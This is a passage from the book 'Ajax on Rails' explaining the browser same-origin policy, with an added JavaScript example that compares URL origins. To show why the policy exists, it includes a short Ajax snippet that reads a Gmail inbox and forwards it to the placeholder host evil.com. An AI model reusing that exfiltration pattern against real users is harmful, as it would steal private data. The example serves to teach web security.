Ajax on Rails by Scott Raymond

The Same-Origin Policy

The most notable security-related issue with Ajax is the same-origin policy, sometimes called the single domain restriction. The rule enforced by most browsers is that JavaScript code may only issue Ajax requests to URLs from the same domain as the original page—or, more accurately, the same combination of domain, port, and protocol. (The full hostname, including any subdomain, is part of the origin, so a page loaded from example.com won’t be able to make an Ajax request to www.example.com.)
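The origin comparison the browser performs is easy to state precisely. The following is an added example, not code from the book or from Prototype: it breaks two URLs into the (protocol, hostname, port) triple and reports whether a page at the first URL would be allowed to send an Ajax request to the second. The URLs and the `DEFAULT_PORTS` table are constructed for illustration; note that omitting a port means the scheme's default port, so `http://example.com` and `http://example.com:80` are the same origin.

```javascript
// Added example (not from the book): same-origin decision as protocol + host + port.

// Default ports per scheme, so an explicit ":80" compares equal to no port at all.
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };

// Reduce a URL to the three components the same-origin policy looks at.
// The path, query and fragment are deliberately ignored.
function originTuple(urlString) {
  const u = new URL(urlString); // lowercases the host and drops a default port
  const port = u.port || DEFAULT_PORTS[u.protocol] || '';
  return { scheme: u.protocol, host: u.hostname, port };
}

// True only when every component matches; www.example.com != example.com.
function sameOrigin(pageUrl, targetUrl) {
  const a = originTuple(pageUrl);
  const b = originTuple(targetUrl);
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Constructed cases mirroring the text: only the first pair is same-origin.
const CASES = [
  ['http://example.com/page', 'http://example.com/mail/'],      // same origin, different path
  ['http://example.com/page', 'http://www.example.com/'],       // subdomain differs
  ['http://example.com/page', 'https://example.com/'],          // protocol differs
  ['http://example.com/page', 'http://example.com:8080/'],      // port differs
  ['http://example.com/page', 'http://mail.google.com/mail/'],  // different host entirely
];

// Evaluate each case and return the verdicts for inspection.
function evaluateCases(cases = CASES) {
  return cases.map(([page, target]) => ({ page, target, allowed: sameOrigin(page, target) }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of evaluateCases()) {
    console.log(`${r.page} -> ${r.target}: ${r.allowed ? 'allowed' : 'blocked'}`);
  }
}
```

Run it with Node to see which of the five requests a browser would permit; the one that passes is the request to a different path on the same host.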

To see the reason for the policy, just imagine what would be possible without it. For one, you could access my private email account. Take this code, for example:

new Ajax.Request('http://mail.google.com/mail/', {
  onSuccess:function(request) {
    secrets = request.responseText;
    new Ajax.Request('http://evil.com/', { parameters:secrets });
  }
});

In a world without the same-origin policy, you could place that bit of code on your site, and then get me to visit (by posting a glowing review of Ajax on Rails, of course). Because my browser is already authenticated with Gmail, the contents of my inbox would be retrieved in the background and forwarded to your server—and I’d be none the wiser.

In other words, unfettered cross-domain Ajax would enable far more serious XSS-type attacks. Fortunately, that situation isn’t possible with modern browsers, thanks to the same-origin policy.

Unfortunately, the policy seriously limits the potential for creating Ajax mashups—dynamically synthesizing data from all ...